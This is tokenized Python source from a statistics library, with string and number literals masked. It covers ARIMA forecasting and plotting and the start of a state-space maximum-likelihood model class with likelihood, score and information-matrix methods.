<EOL> def forecast ( self , steps = <NUM_LIT:1> , exog = None , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if exog is not None : <EOL> if self . k_exog == <NUM_LIT:1> and exog . 
ndim == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> if exog . shape [ <NUM_LIT:0> ] != steps : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . k_ar > <NUM_LIT:0> : <EOL> exog = np . vstack ( ( self . model . exog [ - self . k_ar : , self . k_trend : ] , <EOL> exog ) ) <EOL> forecast = _arma_predict_out_of_sample ( self . params , steps , self . resid , <EOL> self . k_ar , self . k_ma , <EOL> self . k_trend , self . k_exog , <EOL> self . model . endog , <EOL> exog , method = self . model . method ) <EOL> d = self . k_diff <EOL> endog = self . model . data . endog [ - d : ] <EOL> forecast = unintegrate ( forecast , unintegrate_levels ( endog , d ) ) [ d : ] <EOL> fcerr = self . _forecast_error ( steps ) <EOL> conf_int = self . _forecast_conf_int ( forecast , fcerr , alpha ) <EOL> return forecast , fcerr , conf_int <EOL> def plot_predict ( self , start = None , end = None , exog = None , dynamic = False , <EOL> alpha = <NUM_LIT> , plot_insample = True , ax = None ) : <EOL> from statsmodels . graphics . utils import _import_mpl , create_mpl_ax <EOL> _ = _import_mpl ( ) <EOL> fig , ax = create_mpl_ax ( ax ) <EOL> forecast = self . predict ( start , end , exog , '<STR_LIT>' , dynamic ) <EOL> start = self . model . _get_predict_start ( start , dynamic = dynamic ) <EOL> end , out_of_sample = self . model . _get_predict_end ( end , dynamic = dynamic ) <EOL> if out_of_sample : <EOL> steps = out_of_sample <EOL> fc_error = self . _forecast_error ( steps ) <EOL> conf_int = self . _forecast_conf_int ( forecast [ - steps : ] , fc_error , <EOL> alpha ) <EOL> if hasattr ( self . data , "<STR_LIT>" ) : <EOL> from pandas import Series <EOL> forecast = Series ( forecast , index = self . data . predict_dates ) <EOL> ax = forecast . plot ( ax = ax , label = '<STR_LIT>' ) <EOL> else : <EOL> ax . plot ( forecast ) <EOL> x = ax . get_lines ( ) [ - <NUM_LIT:1> ] . get_xdata ( ) <EOL> if out_of_sample : <EOL> label = "<STR_LIT>" . format ( <NUM_LIT:1> - alpha ) <EOL> ax . 
fill_between ( x [ - out_of_sample : ] , conf_int [ : , <NUM_LIT:0> ] , conf_int [ : , <NUM_LIT:1> ] , <EOL> color = '<STR_LIT>' , alpha = <NUM_LIT> , label = label ) <EOL> if plot_insample : <EOL> import re <EOL> k_diff = self . k_diff <EOL> label = re . sub ( "<STR_LIT>" , "<STR_LIT>" , self . model . endog_names ) <EOL> levels = unintegrate ( self . model . endog , <EOL> self . model . _first_unintegrate ) <EOL> ax . plot ( x [ : end + <NUM_LIT:1> - start ] , <EOL> levels [ start + k_diff : end + k_diff + <NUM_LIT:1> ] , label = label ) <EOL> ax . legend ( loc = '<STR_LIT>' ) <EOL> return fig <EOL> plot_predict . __doc__ = _arima_plot_predict <EOL> class ARIMAResultsWrapper ( ARMAResultsWrapper ) : <EOL> pass <EOL> wrap . populate_wrapper ( ARIMAResultsWrapper , ARIMAResults ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import statsmodels . api as sm <EOL> from statsmodels . tsa . arima_process import arma_generate_sample <EOL> y = arma_generate_sample ( [ <NUM_LIT:1.> , - <NUM_LIT> ] , [ <NUM_LIT:1.> , <NUM_LIT> ] , nsample = <NUM_LIT:1000> ) <EOL> arma = ARMA ( y ) <EOL> res = arma . fit ( trend = '<STR_LIT>' , order = ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> y_arma22 = arma_generate_sample ( [ <NUM_LIT:1.> , - <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:1> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma22 = ARMA ( y_arma22 ) <EOL> res22 = arma22 . fit ( trend = '<STR_LIT>' , order = ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> arma22_css = ARMA ( y_arma22 ) <EOL> res22css = arma22_css . fit ( trend = '<STR_LIT>' , order = ( <NUM_LIT:2> , <NUM_LIT:2> ) , method = '<STR_LIT>' ) <EOL> data = sm . datasets . sunspots . load ( ) <EOL> ar = ARMA ( data . endog ) <EOL> resar = ar . 
fit ( trend = '<STR_LIT>' , order = ( <NUM_LIT:9> , <NUM_LIT:0> ) ) <EOL> y_arma31 = arma_generate_sample ( [ <NUM_LIT:1> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma31css = ARMA ( y_arma31 ) <EOL> res31css = arma31css . fit ( order = ( <NUM_LIT:3> , <NUM_LIT:1> ) , method = "<STR_LIT>" , trend = "<STR_LIT>" , <EOL> transparams = True ) <EOL> y_arma13 = arma_generate_sample ( [ <NUM_LIT:1.> , - <NUM_LIT> ] , [ <NUM_LIT:1> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma13css = ARMA ( y_arma13 ) <EOL> res13css = arma13css . fit ( order = ( <NUM_LIT:1> , <NUM_LIT:3> ) , method = '<STR_LIT>' , trend = '<STR_LIT>' ) <EOL> y_arma41 = arma_generate_sample ( [ <NUM_LIT:1.> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT:1> , - <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma41css = ARMA ( y_arma41 ) <EOL> res41css = arma41css . fit ( order = ( <NUM_LIT:4> , <NUM_LIT:1> ) , trend = '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> y_arma14 = arma_generate_sample ( [ <NUM_LIT:1> , - <NUM_LIT> ] , [ <NUM_LIT:1.> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma14css = ARMA ( y_arma14 ) <EOL> res14css = arma14css . fit ( order = ( <NUM_LIT:4> , <NUM_LIT:1> ) , trend = '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> from statsmodels . datasets import webuse <EOL> dta = webuse ( '<STR_LIT>' ) <EOL> wpi = dta [ '<STR_LIT>' ] <EOL> mod = ARIMA ( wpi , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . fit ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import , print_function <EOL> import numpy as np <EOL> import pandas as pd <EOL> from scipy . stats import norm <EOL> from . kalman_smoother import KalmanSmoother , SmootherResults <EOL> from . kalman_filter import ( <EOL> KalmanFilter , FilterResults , PredictionResults , INVERT_UNIVARIATE , SOLVE_LU <EOL> ) <EOL> import statsmodels . tsa . base . tsa_model as tsbase <EOL> import statsmodels . base . wrapper as wrap <EOL> from statsmodels . tools . numdiff import ( <EOL> _get_epsilon , approx_hess_cs , approx_fprime_cs , approx_fprime <EOL> ) <EOL> from statsmodels . tools . decorators import cache_readonly , resettable_cache <EOL> from statsmodels . tools . eval_measures import aic , bic , hqic <EOL> from statsmodels . tools . tools import pinv_extended <EOL> from statsmodels . tools . tools import Bunch <EOL> import statsmodels . genmod . _prediction as pred <EOL> from statsmodels . genmod . families . links import identity <EOL> import warnings <EOL> class MLEModel ( tsbase . TimeSeriesModel ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , endog , k_states , exog = None , dates = None , freq = None , <EOL> ** kwargs ) : <EOL> super ( MLEModel , self ) . __init__ ( endog = endog , exog = exog , <EOL> dates = dates , freq = freq , <EOL> missing = '<STR_LIT:none>' ) <EOL> self . _init_kwargs = kwargs <EOL> self . endog , self . exog = self . prepare_data ( ) <EOL> self . nobs = self . endog . shape [ <NUM_LIT:0> ] <EOL> self . k_states = k_states <EOL> self . initialize_statespace ( ** kwargs ) <EOL> def prepare_data ( self ) : <EOL> """<STR_LIT>""" <EOL> endog = np . array ( self . data . orig_endog , order = '<STR_LIT:C>' ) <EOL> exog = self . data . orig_exog <EOL> if exog is not None : <EOL> exog = np . array ( exog ) <EOL> if endog . ndim == <NUM_LIT:1> : <EOL> endog . shape = ( endog . 
shape [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> return endog , exog <EOL> def initialize_statespace ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> endog = self . endog . T <EOL> self . ssm = KalmanSmoother ( endog . shape [ <NUM_LIT:0> ] , self . k_states , ** kwargs ) <EOL> self . ssm . bind ( endog ) <EOL> self . k_endog = self . ssm . k_endog <EOL> def __setitem__ ( self , key , value ) : <EOL> return self . ssm . __setitem__ ( key , value ) <EOL> def __getitem__ ( self , key ) : <EOL> return self . ssm . __getitem__ ( key ) <EOL> def set_filter_method ( self , filter_method = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_filter_method ( filter_method , ** kwargs ) <EOL> def set_inversion_method ( self , inversion_method = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_inversion_method ( inversion_method , ** kwargs ) <EOL> def set_stability_method ( self , stability_method = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_stability_method ( stability_method , ** kwargs ) <EOL> def set_conserve_memory ( self , conserve_memory = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_conserve_memory ( conserve_memory , ** kwargs ) <EOL> def set_smoother_output ( self , smoother_output = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_smoother_output ( smoother_output , ** kwargs ) <EOL> def initialize_known ( self , initial_state , initial_state_cov ) : <EOL> self . ssm . initialize_known ( initial_state , initial_state_cov ) <EOL> def initialize_approximate_diffuse ( self , variance = None ) : <EOL> self . ssm . initialize_approximate_diffuse ( variance ) <EOL> def initialize_stationary ( self ) : <EOL> self . ssm . initialize_stationary ( ) <EOL> @ property <EOL> def initialization ( self ) : <EOL> return self . ssm . initialization <EOL> @ property <EOL> def initial_variance ( self ) : <EOL> return self . ssm . initial_variance <EOL> @ initial_variance . 
setter <EOL> def initial_variance ( self , value ) : <EOL> self . ssm . initial_variance = value <EOL> @ property <EOL> def loglikelihood_burn ( self ) : <EOL> return self . ssm . loglikelihood_burn <EOL> @ loglikelihood_burn . setter <EOL> def loglikelihood_burn ( self , value ) : <EOL> self . ssm . loglikelihood_burn = value <EOL> @ property <EOL> def tolerance ( self ) : <EOL> return self . ssm . tolerance <EOL> @ tolerance . setter <EOL> def tolerance ( self , value ) : <EOL> self . ssm . tolerance = value <EOL> def fit ( self , start_params = None , transformed = True , <EOL> cov_type = '<STR_LIT>' , cov_kwds = None , method = '<STR_LIT>' , maxiter = <NUM_LIT:50> , <EOL> full_output = <NUM_LIT:1> , disp = <NUM_LIT:5> , callback = None , return_params = False , <EOL> optim_score = None , optim_complex_step = None , optim_hessian = None , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if start_params is None : <EOL> start_params = self . start_params <EOL> transformed = True <EOL> if optim_score is None and method == '<STR_LIT>' : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> kwargs . setdefault ( '<STR_LIT>' , <NUM_LIT> ) <EOL> elif optim_score is None : <EOL> optim_score = '<STR_LIT>' <EOL> elif optim_score not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if optim_hessian not in [ None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise NotImplementedError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if optim_complex_step is None : <EOL> optim_complex_step = not self . ssm . _complex_endog <EOL> elif optim_complex_step and self . ssm . _complex_endog : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if transformed : <EOL> start_params = self . untransform_params ( np . 
array ( start_params ) ) <EOL> flags = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : optim_score , <EOL> '<STR_LIT>' : optim_complex_step <EOL> } <EOL> if optim_hessian is not None : <EOL> flags [ '<STR_LIT>' ] = optim_hessian <EOL> fargs = ( flags , ) <EOL> mlefit = super ( MLEModel , self ) . fit ( start_params , method = method , <EOL> fargs = fargs , <EOL> maxiter = maxiter , <EOL> full_output = full_output , <EOL> disp = disp , callback = callback , <EOL> skip_hessian = True , ** kwargs ) <EOL> if return_params : <EOL> return self . transform_params ( mlefit . params ) <EOL> else : <EOL> res = self . smooth ( mlefit . params , transformed = False , <EOL> cov_type = cov_type , cov_kwds = cov_kwds ) <EOL> res . mlefit = mlefit <EOL> res . mle_retvals = mlefit . mle_retvals <EOL> res . mle_settings = mlefit . mle_settings <EOL> return res <EOL> def filter ( self , params , transformed = True , complex_step = False , <EOL> cov_type = None , cov_kwds = None , return_ssm = False , <EOL> results_class = None , results_wrapper_class = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> self . update ( params , transformed = True , complex_step = complex_step ) <EOL> self . data . param_names = self . param_names <EOL> if complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> result = self . ssm . 
filter ( complex_step = complex_step , ** kwargs ) <EOL> if not return_ssm : <EOL> result_kwargs = { } <EOL> if cov_type is not None : <EOL> result_kwargs [ '<STR_LIT>' ] = cov_type <EOL> if cov_kwds is not None : <EOL> result_kwargs [ '<STR_LIT>' ] = cov_kwds <EOL> if results_class is None : <EOL> results_class = MLEResults <EOL> if results_wrapper_class is None : <EOL> results_wrapper_class = MLEResultsWrapper <EOL> result = results_wrapper_class ( <EOL> results_class ( self , params , result , ** result_kwargs ) <EOL> ) <EOL> return result <EOL> def smooth ( self , params , transformed = True , complex_step = False , <EOL> cov_type = None , cov_kwds = None , return_ssm = False , <EOL> results_class = None , results_wrapper_class = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> self . update ( params , transformed = True , complex_step = complex_step ) <EOL> self . data . param_names = self . param_names <EOL> if complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> result = self . ssm . 
smooth ( complex_step = complex_step , ** kwargs ) <EOL> if not return_ssm : <EOL> result_kwargs = { } <EOL> if cov_type is not None : <EOL> result_kwargs [ '<STR_LIT>' ] = cov_type <EOL> if cov_kwds is not None : <EOL> result_kwargs [ '<STR_LIT>' ] = cov_kwds <EOL> if results_class is None : <EOL> results_class = MLEResults <EOL> if results_wrapper_class is None : <EOL> results_wrapper_class = MLEResultsWrapper <EOL> result = results_wrapper_class ( <EOL> results_class ( self , params , result , ** result_kwargs ) <EOL> ) <EOL> return result <EOL> def loglike ( self , params , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> argnames = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if isinstance ( args [ <NUM_LIT:0> ] , dict ) : <EOL> flags = args [ <NUM_LIT:0> ] <EOL> else : <EOL> flags = dict ( zip ( argnames , args ) ) <EOL> transformed = flags . get ( '<STR_LIT>' , True ) <EOL> complex_step = flags . get ( '<STR_LIT>' , True ) <EOL> for name , value in flags . items ( ) : <EOL> if name in kwargs : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % name ) <EOL> else : <EOL> transformed = kwargs . pop ( '<STR_LIT>' , True ) <EOL> complex_step = kwargs . pop ( '<STR_LIT>' , True ) <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> self . update ( params , transformed = True , complex_step = complex_step ) <EOL> if complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> loglike = self . ssm . loglike ( complex_step = complex_step , ** kwargs ) <EOL> return loglike <EOL> def loglikeobs ( self , params , transformed = True , complex_step = False , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not transformed : <EOL> params = self . transform_params ( params ) <EOL> if complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> self . update ( params , transformed = True , complex_step = complex_step ) <EOL> return self . ssm . 
loglikeobs ( complex_step = complex_step , ** kwargs ) <EOL> def _forecasts_error_partial_derivatives ( self , params , transformed = True , <EOL> approx_complex_step = None , <EOL> approx_centered = False , <EOL> res = None , ** kwargs ) : <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = transformed <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if approx_complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> if res is None : <EOL> self . update ( params , transformed = transformed , <EOL> complex_step = approx_complex_step ) <EOL> res = self . ssm . filter ( complex_step = approx_complex_step , ** kwargs ) <EOL> n = len ( params ) <EOL> partials_forecasts_error = ( <EOL> np . zeros ( ( self . k_endog , self . nobs , n ) ) <EOL> ) <EOL> partials_forecasts_error_cov = ( <EOL> np . zeros ( ( self . k_endog , self . k_endog , self . nobs , n ) ) <EOL> ) <EOL> if approx_complex_step : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:2> , None , n ) <EOL> increments = np . identity ( n ) * <NUM_LIT> * epsilon <EOL> for i , ih in enumerate ( increments ) : <EOL> self . update ( params + ih , transformed = transformed , <EOL> complex_step = True ) <EOL> _res = self . ssm . filter ( complex_step = True , ** kwargs ) <EOL> partials_forecasts_error [ : , : , i ] = ( <EOL> _res . forecasts_error . imag / epsilon [ i ] <EOL> ) <EOL> partials_forecasts_error_cov [ : , : , : , i ] = ( <EOL> _res . forecasts_error_cov . imag / epsilon [ i ] <EOL> ) <EOL> elif not approx_centered : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:2> , None , n ) <EOL> ei = np . zeros ( ( n , ) , float ) <EOL> for i in range ( n ) : <EOL> ei [ i ] = epsilon [ i ] <EOL> self . update ( params + ei , transformed = transformed , <EOL> complex_step = False ) <EOL> _res = self . ssm . 
filter ( complex_step = False , ** kwargs ) <EOL> partials_forecasts_error [ : , : , i ] = ( <EOL> _res . forecasts_error - res . forecasts_error ) / epsilon [ i ] <EOL> partials_forecasts_error_cov [ : , : , : , i ] = ( <EOL> _res . forecasts_error_cov - <EOL> res . forecasts_error_cov ) / epsilon [ i ] <EOL> ei [ i ] = <NUM_LIT:0.0> <EOL> else : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT:3> , None , n ) / <NUM_LIT> <EOL> ei = np . zeros ( ( n , ) , float ) <EOL> for i in range ( n ) : <EOL> ei [ i ] = epsilon [ i ] <EOL> self . update ( params + ei , transformed = transformed , <EOL> complex_step = False ) <EOL> _res1 = self . ssm . filter ( complex_step = False , ** kwargs ) <EOL> self . update ( params - ei , transformed = transformed , <EOL> complex_step = False ) <EOL> _res2 = self . ssm . filter ( complex_step = False , ** kwargs ) <EOL> partials_forecasts_error [ : , : , i ] = ( <EOL> ( _res1 . forecasts_error - _res2 . forecasts_error ) / <EOL> ( <NUM_LIT:2> * epsilon [ i ] ) ) <EOL> partials_forecasts_error_cov [ : , : , : , i ] = ( <EOL> ( _res1 . forecasts_error_cov - _res2 . forecasts_error_cov ) / <EOL> ( <NUM_LIT:2> * epsilon [ i ] ) ) <EOL> ei [ i ] = <NUM_LIT:0.0> <EOL> return partials_forecasts_error , partials_forecasts_error_cov <EOL> def observed_information_matrix ( self , params , transformed = True , <EOL> approx_complex_step = None , <EOL> approx_centered = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> n = len ( params ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = transformed <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . update ( params , transformed = transformed , <EOL> complex_step = approx_complex_step ) <EOL> if approx_complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> res = self . ssm . 
filter ( complex_step = approx_complex_step , ** kwargs ) <EOL> dtype = self . ssm . dtype <EOL> inv_forecasts_error_cov = res . forecasts_error_cov . copy ( ) <EOL> partials_forecasts_error , partials_forecasts_error_cov = ( <EOL> self . _forecasts_error_partial_derivatives ( <EOL> params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered , res = res , ** kwargs ) ) <EOL> tmp = np . zeros ( ( self . k_endog , self . k_endog , self . nobs , n ) , dtype = dtype ) <EOL> information_matrix = np . zeros ( ( n , n ) , dtype = dtype ) <EOL> for t in range ( self . ssm . loglikelihood_burn , self . nobs ) : <EOL> inv_forecasts_error_cov [ : , : , t ] = ( <EOL> np . linalg . inv ( res . forecasts_error_cov [ : , : , t ] ) <EOL> ) <EOL> for i in range ( n ) : <EOL> tmp [ : , : , t , i ] = np . dot ( <EOL> inv_forecasts_error_cov [ : , : , t ] , <EOL> partials_forecasts_error_cov [ : , : , t , i ] <EOL> ) <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> information_matrix [ i , j ] += ( <EOL> <NUM_LIT:0.5> * np . trace ( np . dot ( tmp [ : , : , t , i ] , <EOL> tmp [ : , : , t , j ] ) ) <EOL> ) <EOL> information_matrix [ i , j ] += np . inner ( <EOL> partials_forecasts_error [ : , t , i ] , <EOL> np . dot ( inv_forecasts_error_cov [ : , : , t ] , <EOL> partials_forecasts_error [ : , t , j ] ) <EOL> ) <EOL> return information_matrix / ( self . nobs - self . ssm . loglikelihood_burn ) <EOL> def opg_information_matrix ( self , params , transformed = True , <EOL> approx_complex_step = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if approx_complex_step is None : <EOL> approx_complex_step = transformed <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> score_obs = self . score_obs ( params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , <EOL> ** kwargs ) . 
transpose ( ) <EOL> return ( <EOL> np . inner ( score_obs , score_obs ) / <EOL> ( self . nobs - self . ssm . loglikelihood_burn ) <EOL> ) <EOL> def _score_complex_step ( self , params , ** kwargs ) : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT> , None , len ( params ) ) <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> return approx_fprime_cs ( params , self . loglike , epsilon = epsilon , <EOL> kwargs = kwargs ) <EOL> def _score_finite_difference ( self , params , approx_centered = False , <EOL> ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> return approx_fprime ( params , self . loglike , kwargs = kwargs , <EOL> centered = approx_centered ) <EOL> def _score_harvey ( self , params , approx_complex_step = True , ** kwargs ) : <EOL> score_obs = self . _score_obs_harvey ( <EOL> params , approx_complex_step = approx_complex_step , ** kwargs ) <EOL> return np . sum ( score_obs , axis = <NUM_LIT:0> ) <EOL> def _score_obs_harvey ( self , params , approx_complex_step = True , <EOL> approx_centered = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> n = len ( params ) <EOL> self . update ( params , transformed = True , complex_step = approx_complex_step ) <EOL> if approx_complex_step : <EOL> kwargs [ '<STR_LIT>' ] = INVERT_UNIVARIATE | SOLVE_LU <EOL> res = self . ssm . filter ( complex_step = approx_complex_step , ** kwargs ) <EOL> dtype = self . ssm . dtype <EOL> partials_forecasts_error , partials_forecasts_error_cov = ( <EOL> self . _forecasts_error_partial_derivatives ( <EOL> params , transformed = True , <EOL> approx_complex_step = approx_complex_step , <EOL> approx_centered = approx_centered , res = res , ** kwargs ) ) <EOL> partials = np . zeros ( ( self . nobs , n ) ) <EOL> k_endog = self . k_endog <EOL> for t in range ( self . nobs ) : <EOL> for i in range ( n ) : <EOL> inv_forecasts_error_cov = np . linalg . inv ( <EOL> res . 
forecasts_error_cov [ : , : , t ] ) <EOL> partials [ t , i ] += np . trace ( np . dot ( <EOL> np . dot ( inv_forecasts_error_cov , <EOL> partials_forecasts_error_cov [ : , : , t , i ] ) , <EOL> ( np . eye ( k_endog ) - <EOL> np . dot ( inv_forecasts_error_cov , <EOL> np . outer ( res . forecasts_error [ : , t ] , <EOL> res . forecasts_error [ : , t ] ) ) ) ) ) <EOL> partials [ t , i ] += <NUM_LIT:2> * np . dot ( <EOL> partials_forecasts_error [ : , t , i ] , <EOL> np . dot ( inv_forecasts_error_cov , res . forecasts_error [ : , t ] ) ) <EOL> return - partials / <NUM_LIT> <EOL> def score ( self , params , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> argnames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if isinstance ( args [ <NUM_LIT:0> ] , dict ) : <EOL> flags = args [ <NUM_LIT:0> ] <EOL> flags [ '<STR_LIT>' ] = flags . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> flags = dict ( zip ( argnames , args ) ) <EOL> transformed = flags . get ( '<STR_LIT>' , True ) <EOL> method = flags . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> approx_complex_step = flags . get ( '<STR_LIT>' , None ) <EOL> approx_centered = flags . get ( '<STR_LIT>' , True ) <EOL> for name , value in flags . items ( ) : <EOL> if name in kwargs : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % name ) <EOL> else : <EOL> transformed = kwargs . pop ( '<STR_LIT>' , True ) <EOL> method = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> approx_complex_step = kwargs . pop ( '<STR_LIT>' , None ) <EOL> approx_centered = kwargs . pop ( '<STR_LIT>' , False ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = not self . ssm . _complex_endog <EOL> if approx_complex_step and self . ssm . _complex_endog : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not transformed : <EOL> transform_score = self . 
transform_jacobian ( params ) <EOL> params = self . transform_params ( params ) <EOL> if method == '<STR_LIT>' : <EOL> score = self . _score_harvey ( <EOL> params , approx_complex_step = approx_complex_step , ** kwargs ) <EOL> elif method == '<STR_LIT>' and approx_complex_step : <EOL> score = self . _score_complex_step ( params , ** kwargs ) <EOL> elif method == '<STR_LIT>' : <EOL> score = self . _score_finite_difference ( <EOL> params , approx_centered = approx_centered , ** kwargs ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> if not transformed : <EOL> score = np . dot ( transform_score , score ) <EOL> return score <EOL> def score_obs ( self , params , method = '<STR_LIT>' , transformed = True , <EOL> approx_complex_step = None , approx_centered = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> params = np . array ( params , ndmin = <NUM_LIT:1> ) <EOL> if not transformed and approx_complex_step : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if approx_complex_step is None : <EOL> approx_complex_step = not self . ssm . _complex_endog <EOL> if approx_complex_step and self . ssm . _complex_endog : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if method == '<STR_LIT>' : <EOL> score = self . _score_obs_harvey ( <EOL> params , transformed = transformed , <EOL> approx_complex_step = approx_complex_step , ** kwargs ) <EOL> elif method == '<STR_LIT>' and approx_complex_step : <EOL> epsilon = _get_epsilon ( params , <NUM_LIT> , None , len ( params ) ) <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> score = approx_fprime_cs ( params , self . loglikeobs , epsilon = epsilon , <EOL> kwargs = kwargs ) <EOL> elif method == '<STR_LIT>' : <EOL> kwargs [ '<STR_LIT>' ] = transformed <EOL> score = approx_fprime ( params , self . 
loglikeobs , kwargs = kwargs , <EOL> centered = approx_centered ) <EOL> else : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> return score <EOL> def hessian ( self , params , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> argnames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if isinstance ( args [ <NUM_LIT:0> ] , dict ) : <EOL> flags = args [ <NUM_LIT:0> ] <EOL> flags [ '<STR_LIT>' ] = flags . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> flags = dict ( zip ( argnames , args ) ) <EOL> transformed = flags . get ( '<STR_LIT>' , True ) <EOL> method = flags . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> approx_complex_step = flags . get ( '<STR_LIT>' , None ) <EOL> approx_centered = flags . get ( '<STR_LIT>' , True ) <EOL> for name , value in flags . items ( ) : <EOL> if name in kwargs : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % name ) <EOL> else : <EOL> transformed = kwargs . pop ( '<STR_LIT>' , False ) <EOL> method = kwargs . pop ( '<STR_LIT>' , 